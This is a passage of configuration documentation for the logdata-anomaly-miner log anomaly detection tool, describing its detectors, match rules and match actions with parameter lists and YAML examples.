MatchValueAverageChange timestamp_path: None paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 MatchValueStreamWriter ~~~~~~~~~~~~~~~~~~~~~~ This component extracts values from a given match and writes them to a stream. This can be used to forward these values to another program (when stream is a wrapped network socket) or to a file for further analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time, add the writer object also to the time trigger list. * **stream**: Stream to write the value of the match to. Possible values: 'sys.stdout' or 'sys.stderr' ( **required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **separator**: Use this string as a seperator for the output. String ( **required**) * **missing_value_string**: Write this string if the value is missing. ( **required**) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" MinimalTransitionTimeDetector ~~~~~~~~~~~~~~~~~~~~~ This module defines an detector for minimal transition times between states (e.g. value combinations of stated paths). * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, **required**). * **id_path_list** parser paths where id values can be stored in all relevant log event types (list of strings, **required**). * **ignore_list** parser paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, default: []). * **allow_missing_id** when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, default: False). * **num_log_lines_solidify_matrix** number of processed log lines after which the matrix is solidified. This process is periodically repeated (integer, default: 10000). * **time_output_threshold** threshold for the tested minimal transition time which has to be exceeded to be tested (float, default: 0). * **anomaly_threshold** threshold for the confidence which must be exceeded to raise an anomaly (float, default: 0.05). * **persistence_id** name of persistency document (string, default: 'Default'). * **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean, default: True). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, default: False). .. code-block:: yaml Analysis: - type: MinimalTransitionTimeDetector id: MinimalTransitionTimeDetector paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' anomaly_threshold: 0.05 MissingMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when an expected value is not seen within a given timespan. For example because the service was deactivated or logging disabled unexpectedly. This is complementary to the function provided by NewMatchPathValueDetector. For each unique value extracted by target_path_list, a tracking record is added to expected_values_dict. It stores three numbers: the timestamp the extracted value was last seen, the maximum allowed gap between observations and the next alerting time when currently in error state. When in normal (alerting) state, the value is zero. * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **check_interval**: This integer(seconds) defines the interval in which pre-set or learned values need to appear. Integer min:1 (Default: 3600) * **realert_interval**: This integer(seconds) defines the interval in which the AMiner should alert us about missing token values. Integer min: 1 (Default: 3600) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True .. seealso:: `Wiki: HowTo MissingMatchPathValueDetector `_ NewMatchIdValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector works similar to the NewMatchPathValueComboDetector, but allows to generate combos across multiple log events that are connected by a common value, e.g., trace ID. * **paths** parser paths of values to be analyzed (required, list of strings). * **id_path_list** one or more paths that specify trace information, i.e., an identifier that specifies which log events belong together (required, list of strings, defaults to empty list). * **min_allowed_time_diff** the minimum amount of time in seconds after the first appearance of a log atom with a specific id that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is 2*min_allowed_time_diff (required, float, defaults to 5.0). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths does not refer to an existing parsed data object (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True NewMatchPathDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This class creates events when new data path was found in a parsed atom. * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: NewMatchPathDetector id: NewMatchPathDetector learn_mode: True NewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new value combinations in multiple parser paths. * **paths** parser paths of values to be analyzed (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths does not refer to an existing parsed data object (boolean, defaults to False). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True NewMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new values in a parser path. * **paths** parser paths of values to be analyzed. Multiple paths mean that values from all specified paths are mixed together (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed values should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True ParserCount ~~~~~~~~~~~ This component counts occurring combinations of values and periodically sends the results as a report. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **report_interval** time interval in seconds in which the reports are sent (integer, defaults to 10). * **labels** list of strings that are added to the report for each path in paths parameter (must be the same length as paths list). (list of strings, defaults to empty list) * **split_reports_flag** boolean flag to send report for each path in paths parameter separately when set to True (boolean, defaults to False). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: ParserCount id: ParserCount paths: - "/model/type/syscall/syscall" report_interval: 10 PathArimaDetector ~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to analyze the values of the chosen paths. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. * **event_type_detector** used to track the number of events in the time windows. * **persistence_id** name of persistency document. * **output_logline** specifies whether the full parsed log atom should be provided in the output. * **learn_mode** specifies whether new frequency measurements override ground truth frequencies. * **num_init** number of lines processed before the period length is calculated. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **alpha** significance level of the estimated values. * **alpha_bt** significance level for the bt test. * **num_results_bt** number of results which are used in the binomial test. * **num_min_time_history** number of lines processed before the period length is calculated. * **num_max_time_history** maximum number of values of the time_history. * **num_periods_tsa_ini** number of periods used to initialize the Arima-model. .. code-block:: yaml Analysis: - type: "EventTypeDetector" id: ETD - type: 'PathArimaDetector' id: PTSA event_type_detector: ETD paths: ["/model/model/val1", "/model/model/val2"] num_init: 20 force_period_length: True set_period_length: 15 num_periods_tsa_ini: 10 PathValueTimeIntervalDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector analyzes the time intervals of the appearance of log_atoms. It sends a report if log_atoms appear at times outside of the intervals. The considered time intervals depend on the combination of values in the target_paths of target_path_list. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values** when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to True). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted (string of lists, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **time_period_length** length of the time window in seconds for which the appearances of log lines are identified with each other (integer, defaults to 86400). * **max_time_diff** maximal time difference in seconds for new times. If the difference of the new time to all previous times is greater than max_time_diff the new time is considered an anomaly (integer, defaults to 360). * **num_reduce_time_list** number of new time entries appended to the time list, before the list is being reduced (integer, defaults to 10). .. code-block:: yaml Analysis: - type: PathValueTimeIntervalDetector id: PathValueTimeIntervalDetector paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" time_period_length: 86400 max_time_diff: 3600 num_reduce_time_list: 10 PCADetector ~~~~~~~~~~~ This class creates events if event or value occurrence counts are outliers in PCA space. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate dimensions. When no paths are specified, the events given by the full path list are analyzed (list of strings). * **window_size** the length of the time window for counting in seconds (float, defaults to 600 seconds). * **min_anomaly_score** the minimum computed outlier score for reporting anomalies. Scores are scaled by training data, i.e., reasonable minimum scores are > 1 to detect outliers with respect to currently trained PCA matrix (float, defaults to 1.1). * **min_variance** the minimum variance covered by the principal components (float in range [0, 1], defaults to 0.98). * **num_windows** the number of time windows in the sliding window approach. Total covered time span = window_size * num_windows (integer, defaults to 50). * **persistence_id** name of persistency document (string, defaults to Default). * **learn_mode** specifies whether new count measurements are added to the PCA count matrix (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list) * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **output_event_handlers** list of event handler id that anomalies are forwarded to (list of strings, defaults is to send to all event handlers). .. code-block:: yaml Analysis: - type: PCADetector id: PCADetector paths: - "/model/username" - "/model/service" window_size: 60 min_anomaly_score: 1.2 min_variance: 0.95 num_windows: 100 learn_mode: true SlidingEventFrequencyDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for event and value frequency exceedances with a sliding window approach. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **scoring_path_list** parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **set_upper_limit** the length of the time window for counting in seconds. * **local_maximum_threshold** sets the threshold for the detection of local maxima in the frequency analysis. A local maximum occurrs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: SlidingEventFrequencyDetector id: SEFD window_size: 3600 set_upper_limit: 10 TimeCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~ This component tries to find time correlation patterns between different log atoms. When a possible correlation rule is detected, it creates an event including the rules. This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006. .. code-block:: yaml Analysis: - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 .. _TimeCorrelationViolationDetector: TimeCorrelationViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when one of the given time correlation rules is violated. This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006 .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 .. seealso:: :ref:`MatchRules` SimpleMonotonicTimestampAdjust ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Adjust decreasing timestamp of new records to the maximum observed so far to ensure monotony for other analysis components. TimestampsUnsortedDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector is useful to to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. .. code-block:: yaml Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector TSAArimaDetector ~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to track appearance frequencies of event lines. * **paths** at least one of the parser paths in this list needs to appear in the event to be analyzed (list of strings). * **event_type_detector** used to track the number of event lines in the time windows (string). * **waiting_time_for_tsa** time in seconds, until the time windows are being initialized (integer, defaults to 300 seconds). * **num_sections_waiting_time_for_tsa** number of sections of the initialization window (integer, defaults to 10). * **acf_pause_interval_percentage** states which area of the results of the ACF are not used to find the highest peak (float, defaults to 0.2). * **build_sum_over_values** states if the sum of a series of counts is built before applying the TSA (boolean, defaults to false). * **num_periods_tsa_ini** Number of periods used to initialize the Arima-model (integer, defaults to 20). * **num_division_time_step** Number of divisions of the time window to calculate the time step (integer, defaults to 10). * **alpha** significance level of the estimated values (float, defaults to 0.05). * **num_min_time_history** minimal number of values of the time_history after it is initialized (integer, defaults to 20). * **num_max_time_history** maximal number of values of the time_history (integer, defaults to 30). * **num_results_bt** number of results which are used in the binomial test, which is used before reinitializing the ARIMA model (integer, defaults to 15). * **alpha_bt** significance level for the bt test (float, defaults to 0.05). * **round_time_interval_threshold** Threshold for the rounding of the time_steps to the times in self.assumed_time_steps. The higher the threshold the easier the time is rounded to the next time in the list (float, defaults to 0.02). * **acf_threshold** threshold, which must be exceeded by the highest peak of the cdf function of the time series, to be analyzed (float, defaults to 0.2). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **acf_auto_pause_interval** states if the pause area is automatically set. If enabled, the variable acf_pause_interval_percentage loses its functionality. * **acf_auto_pause_interval_num_min** states the number of values in which a local minima must be the minimum, to be considered a local minimum of the function and not an outlier. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **min_log_lines_per_time_step** states the minimal average number of log lines per time step to make a TSA. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD save_values: False - type: 'TSAArimaDetector' id: TSA event_type_detector: ETD waiting_time_for_tsa: 1728000 num_sections_waiting_time_for_tsa: 1000 num_division_time_step: 10 alpha: 0.05 num_results_bt: 30 alpha_bt: 0.05 num_max_time_history: 30000 round_time_interval_threshold: 0.1 acf_threshold: 0.02 VerboseUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates verbose output for unparsed events. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'VerboseUnparsedAtomHandler' id: vuah SimpleUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates basic output for unparsed events. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'SimpleUnparsedAtomHandler' id: vuah ValueRangeDetector ~~~~~~~~~~~~~~~~~~ This detector generates ranges for numeric values, detects values outside of these ranges, and automatically extends ranges when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for value range generation (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which numeric ranges should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'ValueRangeDetector' paths: - '/parser/value' id_path_list: - '/parser/id' learn_mode: True VariableCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~ First, this detector finds a list of viable variables for each event type. Second, it builds pairs of variables. Third, correlations are generated and thereafter tested and updated. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** event_type_detector. Used to get the event numbers and values of the variables, etc. * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **num_init** minimal number of lines of one event type to initialize the correlation rules. * **num_update** number of lines after the initialization after which the correlations are periodically tested and updated. * **check_cor_thres** threshold for the number of allowed different values of the distribution to be considerd a correlation. * **check_cor_prob_thres** threshold for the difference of the probability of the values to be considerd a correlation. * **check_cor_num_thres** number of allowed different values for the calculation if the distribution can be considerd a correlation. * **min_values_cors_thres** minimal number of appearances of values on the left side to consider the distribution as a possible correlation. * **new_vals_alarm_thres** threshold which has to be exceeded by the number of new values divided by the number of old values to report an anomaly. * **disc_div_thres** diversity threshold for variables to be considered discrete. * **num_steps_create_new_rules** number of update steps, for which new rules are generated periodically. * **num_upd_until_validation** number of update steps, for which the rules are validated periodically. * **num_end_learning_phase** number of update steps until the update phase ends and the test phase begins. False if no End should be defined. * **num_bt** number of considered testsamples for the binomial test. * **alpha_bt** significance level for the binomialtest for the test results. * **used_homogeneity_test** states the used homogeneity test which is used for the updates and tests of the correlations. The implemented methods are ['Chi', 'MaxDist']. * **alpha_chisquare_test** significance level alpha for the chisquare test. * **max_dist_rule_distr** maximum distance between the distribution of the rule and the distribution of the read in values before the rule fails. * **used_presel_meth** used preselection methods. The implemented methods are ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']. * **intersect_presel_meth** states if the intersection or the union of the possible correlations found by the presel_meth is used for the resulting correlations. * **percentage_random_cors** percentage of the randomly picked correlations of all possible ones in the preselection method random. * **match_disc_vals_sim_tresh** similarity threshold for the preselection method pick_cor_match_disc_vals. * **exclude_due_distr_lower_limit** lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded. * **match_disc_distr_threshold** threshold for the preselection method pick_cor_match_disc_distr. * **used_cor_meth** used correlation detection methods. The implemented methods are ['Rel', 'WRel']. * **used_validate_cor_meth** used validation methods. The implemented methods are ['coverVals', 'distinctDistr']. * **validate_cor_cover_vals_thres** threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation. * **validate_cor_distinct_thres** threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions must surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD - type: 'VariableCorrelationDetector' event_type_detector: ETD num_init: 10000 num_update: 1000 num_steps_create_new_rules: 10 used_presel_meth: ['matchDiscDistr', 'excludeDueDistr'] used_validate_cor_meth: ['distinctDistr', 'coverVals'] used_cor_meth: ['WRel'] VariableTypeDetector ~~~~~~~~~~~~~~~~~~~~ This detector analyses each variable of the event_types by assigning them the implemented variable types. * **paths** List of paths, which variables are being tested for a type. All other paths will not get a type assigned. * **learn_mode** states, if found variable types are updated when a test fails. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** event_type_detector. Used to get the event numbers and values of the variables, etc. * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **save_statistics** tracks the indicators and changed variable types, if set to True. * **use_empiric_distr** states if empiric distributions of the values should be used if no continuous distribution is detected * **used_gof_test** states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. * **gof_alpha** significance level for p-value for the distribution test of the initialization. * **s_gof_alpha** significance level for p-value for the sliding gof-test in the update step. * **s_gof_bt_alpha** significance level for the binomialtest of the test results of the s_gof-test. * **d_alpha** significance level for the binomialtest of the single discrete variables. * **d_bt_alpha** significance level for the binomialtest of the test results of the discrete tests. * **div_thres** threshold for diversity of the values of a variable. The higher the more values have to be distinct to be considered to be continuous distributed. * **sim_thres** threshold for similarity of the values of a variable. The higher the more values have to be common to be considered discrete. * **indicator_thres** threshold for the variable indicators to be used in the event indicator. * **num_init** number of lines processed before detecting the variable types. * **num_update** number of values for which the variableType is updated. * **num_update_unq** number of values for which the values of type unq is unique (last num_update + num_update_unq values are unique). * **num_s_gof_values** number of values which are tested in the s_gof-test. * **num_s_gof_bt** number of tested s_gof-tests for the binomialtest of the test results of the s_gof-tests. * **num_d_bt** number of tested discrete samples for the binomialtest of the test results of the discrete tests. * **num_pause_discrete** number of paused updates, before the discrete var type is adapted. * **num_pause_others** number of paused updates, before trying to find a new variable type for the variable type others. * **test_gof_int** states if integer number should be tested for the continuous variable type. * **num_stop_update** switch the LearnMode to False after num_stop_update processed lines. If False LearnMode will not be switched to False. * **silence_output_without_confidence** silences all messages without a confidence-entry. * **silence_output_except_indicator** silences all messages which are not related with the calculated indicator. * **num_var_type_hist_ref** states how long the reference for the var_type_history_list is. The reference is used in the evaluation. * **num_update_var_type_hist_ref** number of update steps before the var_type_history_list is being updated. * **num_var_type_considered_ind** this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. * **num_stat_stop_update** number of static values of a variable, to stop tracking the variable type and read in in eventTypeD. Default is False. * **num_updates_until_var_reduction** number of update steps until the variables are tested, if they are suitable for an indicator. If not suitable, they are removed from the tracking of EvTypeD. Set to 0 to analyze all variables. Default is 20. * **var_reduction_thres** threshold for the reduction of variable types. The most likely none others var type must have a higher relative appearance for the variable to be further checked. * **num_skipped_ind_for_weights** number of the skipped indicators for the calculation of the indicator weights. * **num_ind_for_weights** number of indicators used in the calculation of the indicator weights. * **used_multinomial_test** states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi'. Where 'MT' means the original MT, 'Approx' is the approximation with single BTs and 'Chi' is the ChisquareTest. * **used_range_test** states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. * **range_alpha** significance niveau for the range variable type. * **range_threshold** maximal proportional deviation from the range before the variable type is rejected. * **range_limits_factor** factor for the limits of the range variable type. * **num_reinit_range** number of update steps until the range variable type is reinitialized. Set to zero if not desired. * **dw_alpha** significance niveau of the durbin watson test to test serial correlation. If the test fails the type range is assigned to the variable instead of continuous. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD - type: 'VariableTypeDetector' event_type_detector: ETD num_init: 200 num_update: 100 num_s_gof_values: 100 .. _MatchRules: ---------- MatchRules ---------- The following detectors work with MatchRules: * :ref:`AllowlistViolationDetector` * :ref:`TimeCorrelationViolationDetector` .. note:: MatchRules must be defined in the "Analysis"-part of the configuration. Every MatchRule can also define a :ref:`MatchAction` which is run when the MatchRule is applied. AndMatchRule ~~~~~~~~~~~~ This component provides a rule to match all subRules (logical and). .. code-block:: yaml Analysis: - type: AndMatchRule id: and_match_rule1 sub_rules: - "path_exists_match_rule1" - "negation_match_rule1" OrMatchRule ~~~~~~~~~~~ This component provides a rule to match any subRules (logical or). .. code-block:: yaml Analysis: - type: OrMatchRule id: or_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" ParallelMatchRule ~~~~~~~~~~~~~~~~~ This component is a rule testing all the subrules in parallel. From the behaviour it is similar to the OrMatchRule, returning true if any subrule matches. The difference is that matching will not stop after the first positive match. This does only make sense when all subrules have match actions associated. .. code-block:: yaml Analysis: - type: ParallelMatchRule id: parallel_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" ValueDependentDelegatedMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component is a rule delegating rule checking to subrules depending on values found within the parser_match. The result of this rule is the result of the selected delegation rule. NegationMatchRule ~~~~~~~~~~~~~~~~~ Match elements of this component return true when the subrule did not match. .. code-block:: yaml Analysis: - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: NegationMatchRule id: negation_match_rule2 sub_rule: "path_exists_match_rule2" PathExistsMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path was found in the parsed match data. .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" ValueMatchRule ~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly the given parsed value. .. code-block:: yaml Analysis: - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" ValueListMatchRule ~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly one of the values included in the value list. ValueRangeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and the value is included in [lower, upper] range. StringRegexMatchRule ~~~~~~~~~~~~~~~~~~~~ Elements of this component return true when the given path exists and the string repr of the value matches the regular expression. ModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in [lower, upper] range. ValueDependentModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 rom that date modulo the given value are included in a [lower, upper] range selected by values from the match. IPv4InRFC1918MatchRule ~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges. This could also be done by distinct range match elements, but as this kind of matching is common, have an own element for it. DebugMatchRule ~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match result is returned. DebugHistoryMatchRule ~~~~~~~~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just adds the evaluated log_atom to a ObjectHistory. .. _MatchAction: ---------- MatchActions ---------- .. note:: MatchActions must be defined in the "Analysis"-part of the configuration. EventGenerationMatchAction ~~~~~~~~~~~~ This generic match action forwards information about a rule match on parsed data to a list of event handlers. .. code-block:: yaml Analysis: - type: EventGenerationMatchAction id: ip_match_action event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" AtomFilterMatchAction ~~~~~~~~~~~~ This generic match rule forwards all rule matches to a list of `AtomHandlerInterface` instances using the `SubhandlerFilter`. When `delete_components` is used, all components from the `subhandler_list` are removed from the default `SubhandlerFilter`. .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector1 paths: - "/model/second" - type: AtomFilterMatchAction id: afma subhandler_list: - NewMatchPathValueDetector1 stop_when_handled_flag: True delete_components: True ------------- EventHandling ------------- EventHandler are output modules that allow the logdata-anomaly-miner to write alerts to specific targets. All EventHandler must have the following parameters and may have additional specific parameters that are defined in the respective sections. * **id**: must be a unique string (required) * **type**: must be an existing Analysis component (required) * **json**: A boolean value that enables that the output is formatted in json (default: False) * **pretty**: A boolean value that specifies whether json output should be in a single line (False) or pretty printed (True) (default: True) * **score**: A boolean value that enables that a confidence is added to the output of certain detectors (default: False) * **weights**: A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list and the corresponding values are the 